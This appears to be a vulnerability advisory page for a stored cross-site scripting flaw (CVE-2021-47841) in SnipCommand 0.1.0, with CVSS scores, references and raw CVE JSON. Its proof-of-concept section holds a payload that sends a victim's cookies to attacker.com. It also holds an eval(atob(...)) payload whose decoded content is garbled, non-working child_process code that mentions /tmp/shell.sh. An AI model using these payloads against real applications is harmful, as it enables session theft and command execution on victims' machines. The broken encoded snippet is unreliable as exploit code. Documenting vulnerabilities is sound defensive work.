Security Vulnerability Report
CVE-2021-47841 CVSS 6.1 MEDIUM

CVE-2021-47841

Published: 2026-01-16 19:16:10
Last Modified: 2026-04-15 00:35:42

Description

SnipCommand 0.1.0 contains a cross-site scripting vulnerability that allows attackers to inject malicious payloads into command snippets. Attackers can execute arbitrary code by embedding malicious JavaScript that triggers remote command execution through file or title inputs.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SnipCommand 0.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// SnipCommand Stored XSS PoC
// Target: SnipCommand 0.1.0
// Payload: Inject malicious JavaScript via title or file input fields
const vulnerablePayload = {
  title: '<script>fetch("https://attacker.com/log?cookie="+document.cookie)</script>',
  file: '<img src=x onerror="eval(atob(\'cmVxdWlyZShcImNoaWxkX3Byb2Nlc3NcIikuc3Bhd25cImNhbGNcIiwiY2FsYyAtZSAnL3RtcC9zaGVsbC5zaCcpXCJcbnt9XCJcbi5leGVjKClcblxuY29uc3Qgc2hlbGwgPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlY3VUeXBlKCdjYWxjJyk7XG5zaGVsbC5zdGRvdXQuZW5kKCdjbG9zZScpO1xu\'))">',
  command: 'echo "Test Command"'
};

// Attack chain:
// 1. Attacker injects XSS payload through title/file fields
// 2. Payload is stored in database without sanitization
// 3. Victim views the command snippet
// 4. Malicious JavaScript executes in victim's browser
// 5. Attacker steals session cookies or executes further attacks

References

https://github.com/gurayyarar/SnipCommand
https://imgur.com/a/I2reH1M
https://www.exploit-db.com/exploits/49829
https://www.vulncheck.com/advisories/snipcommand-persistent-cross-site-scripting

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47841", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:09.860", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SnipCommand 0.1.0 contains a cross-site scripting vulnerability that allows attackers to inject malicious payloads into command snippets. Attackers can execute arbitrary code by embedding malicious JavaScript that triggers remote command execution through file or title inputs."}, {"lang": "es", "value": "SnipCommand 0.1.0 contiene una vulnerabilidad de cross-site scripting que permite a los atacantes inyectar cargas útiles maliciosas en fragmentos de comandos. Los atacantes pueden ejecutar código arbitrario incrustando JavaScript malicioso que desencadena la ejecución remota de comandos a través de entradas de archivo o título."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/gurayyarar/SnipCommand", "source": "[email protected]"}, {"url": "https://imgur.com/a/I2reH1M", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49829", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/snipcommand-persistent-cross-site-scripting", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/snipcommand-persistent-cross-site-scripting", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}